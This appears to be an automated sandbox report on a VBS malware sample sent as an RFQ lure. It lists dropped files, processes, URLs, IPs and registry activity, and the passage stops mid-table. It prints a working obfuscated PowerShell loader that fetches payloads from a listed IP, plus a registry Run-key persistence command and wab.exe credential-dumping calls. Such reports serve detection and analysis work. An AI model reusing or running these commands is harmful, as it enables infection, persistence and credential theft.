C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213126.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213227.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213330.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213430.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213533.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213634.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213735.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213838.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_213939.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214042.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214143.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214247.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214350.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214451.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214555.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214658.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214802.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_214906.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215010.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215114.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215218.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215322.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215429.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215536.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215643.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215753.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_215903.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220023.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Screenshots\time_20240418_220147.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gnshsgm.zgy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fnyzpx2.ikh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e13p3ojw.iz2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw2dlvrg.ong.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv4034.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0xa59b1530, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Unpredictableness.Neg
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 311 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6;
$Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183,
$Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid
'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw
pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro
arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan
li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1
,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH
skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov
rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf
nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid
'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan%
Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat
lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo
ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen
dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o
Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik
malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU
sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen
(Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch
nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm
Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid
'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud
e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks
Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho
Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc(
brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH
Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen
(Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet
Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl
Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS
iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid
' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid
' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver=
,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic
') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas
Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt
O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino
Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea
Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant
gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer
EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol
uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti.
J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4
OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi SupernFleshlglestrasVdderetAkti.li
EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling:
SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS
tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn
UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy
dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi:
Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa
coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5
Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6;
$Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183,
$Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid
'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw
pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro
arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan
li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1
,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH
skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov
rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf
nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid
'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan%
Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat
lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo
ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen
dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o
Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik
malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU
sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen
(Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch
nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm
Adelh.Exc.llNMaskineDividetU,dsig.,dningWM kroseSfogatbInfiksCpi.kanlRena liInterpeBemurmnIndvaltCrypto ');Skruegangen (Noncolloid
'Tonika$fabulaI Sankts H.ndeoBoligptUdvalgoUnperipArch,ue Cit,osRemrke. ForelHBoretle.oktorabesaaed ,hougeGrmmelrUnnicksStud
e[F,itur$L mnopFInfrate Inchaw Ru,dbtSinoloeyhwhcarU kadeeMaskinr Kop l]Anastr=Oinome$SchmeeTBountio onmart,etereaUnderdlUsersks
Ro tgaByl,vbnafvaskeValgber TragtiAflusnnUrgedig Red,eeU.dersnBarrels embus ');$Hunched125=Noncolloid 'BullenIHvdstis Martho
Nonu tHarm no garosp aempeened assVi dtb. teglvDInurnmoFrilagwProgran ,oponlRetranoudraabaMatrosdSysk iFArtikeiDecelelVagotoeConcoc(
brico$QuinquO unautnPit,hpo.eterrmLedemoaOmniact PhysioPres glAalebloInordigPartheiDysoxicRoadcraReva,ulPla sm,Thr.ve$ NoncoH
Filmpranfrsed AgesteAnayaclA pelssM usqueMochef)ecdyse ';$Hunched125=$Scouress[1]+$Hunched125;$Hrdelse=$Scouress[0];Skruegangen
(Noncolloid 'Niver,$Ched,agSku,apl,asetvoPlanetb M.senaFalketlGauntl:SabianOPleasusRudernsSpndkriSm.ochf g.citlEnerveuty,agteinventnTweedet
Hedes=Adfrds( HormoTUsurpme AerobsDeignit Vidun-FumlegPShortcaFaa.ektsampelh Lucar P,dera$comf.sHBrednirvapo.idst,dfseSkib.tl
Denatsto,nefe Thre.)Aktivi ');while (!$Ossifluent) {Skruegangen (Noncolloid ' Fe.er$Sk,lnng Al.ehlUptakeo Ho,sebBarkeraC aspalZymoly:S,gnifAIncatenVagnartMaterniJenopetThy.ore.dstanrIndaanrSkraamoAntitorNeust,kS
iklio Wanglr NostapSpildpstvrend=Rev rs$Sm.atit DiplorTermoduStifteeBarbas ') ;Skruegangen $Hunched125;Skruegangen (Noncolloid
' Lyk wS .nkamt Episca OvervrLace,at Lys,g-HndervS Skolel,nquiceJanglieAnd.gtptungme Ku.kek4Nummer ');Skruegangen (Noncolloid
' Deifo$Transcg.rugerl Tan,eoScaniabKremloaSheb,alRaflin:VellalOVolderssalgsdsactinoi OpstifMinimul.egatiuPanicle recirnHarmontErhver=
,hame(Micro.TOmstyrePiercesPrimittBi boq-,elysnPTec niaAff litNovellh Stev Unwrat$SignalHuncontrF ldspdHirslee tjlaplWherrisSenioreResoci)Pa.tic
') ;Skruegangen (Noncolloid 'C,ndle$ Parleg RebuclPa madoMaltrabGipsdea St,lnlTrigem:Ge,nemDtawkeer Uvan,iglidenfv nligtPhantasAnlbegrP,ovoseZymosas
Squawu DybstlSto pitModsp.aCir ultDecoloe BerigrUnd.rk=Eunuch$Genredg UddanlPirredoCoatimbAfs.nda Ord.nlMultit:BrickbNRevisioTsubodnOverofrtrimoreRntgencEfterlt
O ergi DelstfTankf,iR,tschadesoxyb.mkamplMi,ireeFamili+ Abstr+Maskin%Kalcin$ Uig nTDefinio Grea pB.ulkcs hya,nlAnpa.t.Ac.entcTegnino
Plastu Brassn jgerstInabed ') ;$Onomatological=$Topsl[$Driftsresultater];}Skruegangen (Noncolloid ' Crede$U.syreg BesvrlHeterooKosherbCaiquea
Ron,llForfor:,usareEKrem trTiss mn elefor Cel ui Mo.tenDeviligGaug,asKnirket Finhvi HomoelDagglesRub,nstunbalkapreludn ChiandBipo,sePant
gn SkattsFemina Cuem.= Midle ultivGpeanuteGeys.rtunshro-ErklriC SubseoIntercnAmmedetbraknsealfil nHyd.ogtCausre Karak$ElektrHForurer
EntopdAffrone NonexlJ ntjespesticeEn iro ');Skruegangen (Noncolloid 'Chizza$ClinodgAlangilBassetoMaternbi,tuitaAmueixlLi ief:CollapPCol
uro,andsarArbejdr,istrii ntididApprokgKartotyphotog Data,e=Philip ,umat[KettapSPbeleny damkus BilabtUnfouneJvningmhemsti.
J rdbC Ba.reoSnoretn lydskvOveriseSkrmterHovedhtIschia] Tilbe:Chefko: Wen iFZonelorSukkeroSkorpem ,caloBperspeaNewlinsHrebrieIbrugv6Darc.j4
OrrhoSTr,nedtHarberr SubliiDoughnn ,randgBlindl( Press$conserE KlupprSuperinUdviklr Cenobi SupernFleshlglestrasVdderetAkti.li
EncyslArterisBiennetUlricha hooglnFleshidPorcele spytsnStolidsAab.nb)Unmesh ');Skruegangen (Noncolloid 'Summem$F.emtrgUrticolGranatoPendl,b.ageevablgesllAvling:
SpectIDogmendSomna,e Metinh HemociKonstrsTe,sentEftermoTidsler IrrepiSkrbuge ollisnJurelosT,wnle Yajnav=Sp.net Ha,pul[Te.efoS
tabscyKinesesJumpietFlugtseLivsfoma.krft. UnderT ,orhae ogyix StregtMastin.AposteESame,snKlanercSkatteokardusdNongeniForsynn
UdslygEndevr] Augus:M,conm:RematrAnewsmaS trabeCOpdeliITr ktoImbaend.FitcheGSurribeHemi it MotivS ougietTvre,trM dianiHrskarnUntem.gFilmsk(Precon$HamdmaPTy
dsloQ.ixotrAfsvaerKlareni .rassdKassedg On,ley .rbej)Udenri ');Skruegangen (Noncolloid 'Besti.$riverbg.leasulEfterkoIrr.tabcacopraAnnexelCallgi:
Forb.F olyoprSpewereOzo.idmGravemf EuctirOkk.lteNdudga=Do,ing$EupomaIMalaridBriggseUdst,ahIdrtskiAnglomsLiblabtChar coMusikarHeptagiNa
coteAftegnnA mangsRelate.LiderlsRullenu Syn.lbFrimrks Triant Raadsr raveliCott.nnUnderagReform(Sylvan3Eviden2 Ree,l2 Indlg3astron5
Urteg9Benytt, Chann2 Secur9Plenis0.artis6Subtr.3 ilbag)Vansir ');Skruegangen $Fremfre;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ
/d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1
$Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.184
|
unknown
|
||
|
http://www.imvu.comppData
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://87.121.105.184/Fodgngerovergangs.prmXR
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://87.121.105.184/Fodgngerovergangs.prmP
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://87.121.105.184/JTcKQkcYvvHPBH210.bin
|
87.121.105.184
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.105.184/Fodgngerovergangs.prm
|
87.121.105.184
|
||
|
http://87.121.H
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paygateme.net
|
146.70.57.34
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
87.121.105.184
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
146.70.57.34
|
paygateme.net
|
United Kingdom
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
